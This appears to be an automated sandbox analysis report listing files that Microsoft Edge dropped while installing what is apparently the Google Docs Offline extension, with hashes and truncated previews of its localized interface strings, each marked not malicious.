SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\vi\messages.json

Download File

